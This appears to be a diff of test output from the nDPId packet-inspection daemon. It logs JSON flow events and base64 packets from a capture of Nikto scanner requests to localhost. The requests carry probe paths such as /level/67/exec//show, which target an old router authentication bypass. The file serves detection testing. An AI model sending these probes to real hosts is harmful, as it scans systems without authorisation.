+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277678,"flow_last_seen":1576420277678,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50790,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/66\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001313)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277680,"flow_last_seen":1576420277680,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":1,"flow_last_seen":1576420277680,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277680,"pkt":"AAAAAAAAAAAAAAAACABFAADI\/OVAAEAGP0h\/AAABfwAAAcZoH5ACKMXwYFGAmIAYAED+vAAAAQEICp1m\/tidZv7YR0VUIC9sZXZlbC82Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzE0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277680,"flow_last_seen":1576420277680,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50792,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/67\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001314)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277680,"flow_last_seen":1576420277680,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50792,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/67\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001314)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277681,"flow_last_seen":1576420277681,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_packet_id":1,"flow_last_seen":1576420277681,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277681,"pkt":"AAAAAAAAAAAAAAAACABFAADIw2NAAEAGeMp\/AAABfwAAAcZqH5BLUvpuf7sPloAYAED+vAAAAQEICp1m\/tmdZv7ZR0VUIC9sZXZlbC82OC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTUpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277681,"flow_last_seen":1576420277681,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50794,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/68\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001315)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277681,"flow_last_seen":1576420277681,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50794,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/68\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001315)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277683,"flow_last_seen":1576420277683,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_packet_id":1,"flow_last_seen":1576420277683,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277683,"pkt":"AAAAAAAAAAAAAAAACABFAADIBQVAAEAGNyl\/AAABfwAAAcZsH5CyYjwQgGi0OYAYAED+vAAAAQEICp1m\/tudZv7bR0VUIC9sZXZlbC82OS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzE2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277683,"flow_last_seen":1576420277683,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50796,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/69\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001316)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277683,"flow_last_seen":1576420277683,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50796,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/69\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001316)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277685,"flow_last_seen":1576420277685,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_packet_id":1,"flow_last_seen":1576420277685,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277685,"pkt":"AAAAAAAAAAAAAAAACABFAADI1dZAAEAGZld\/AAABfwAAAcZuH5B\/K+zaVaEXFIAYAED+vAAAAQEICp1m\/tydZv7cR0VUIC9sZXZlbC83MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTcpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277685,"flow_last_seen":1576420277685,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50798,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/70\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001317)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277685,"flow_last_seen":1576420277685,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50798,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/70\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001317)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277687,"flow_last_seen":1576420277687,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_packet_id":1,"flow_last_seen":1576420277687,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277687,"pkt":"AAAAAAAAAAAAAAAACABFAADIUq1AAEAG6YB\/AAABfwAAAcZwH5AONGunkxG0mYAYAED+vAAAAQEICp1m\/t+dZv7fR0VUIC9sZXZlbC83MS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzE4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277687,"flow_last_seen":1576420277687,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50800,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/71\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001318)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277687,"flow_last_seen":1576420277687,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50800,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/71\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001318)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277689,"flow_last_seen":1576420277689,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_packet_id":1,"flow_last_seen":1576420277689,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277689,"pkt":"AAAAAAAAAAAAAAAACABFAADIo8lAAEAGmGR\/AAABfwAAAcZyH5BwuZrK24oufIAYAED+vAAAAQEICp1m\/uGdZv7hR0VUIC9sZXZlbC83Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277689,"flow_last_seen":1576420277689,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50802,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/72\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001319)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277689,"flow_last_seen":1576420277689,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50802,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/72\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001319)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277691,"flow_last_seen":1576420277691,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277691,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":1,"flow_last_seen":1576420277691,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277691,"pkt":"AAAAAAAAAAAAAAAACABFAADIVsBAAEAG5W1\/AAABfwAAAcZ0H5BhJ2+x3S4KSIAYAED+vAAAAQEICp1m\/uOdZv7jR0VUIC9sZXZlbC83My9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzIwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277691,"flow_last_seen":1576420277691,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277691,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50804,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/73\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001320)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277691,"flow_last_seen":1576420277691,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277691,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50804,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/73\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001320)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277693,"flow_last_seen":1576420277693,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277693,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_packet_id":1,"flow_last_seen":1576420277693,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277693,"pkt":"AAAAAAAAAAAAAAAACABFAADIebZAAEAGwnd\/AAABfwAAAcZ2H5BNR0C8mP2KqIAYAED+vAAAAQEICp1m\/uWdZv7lR0VUIC9sZXZlbC83NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 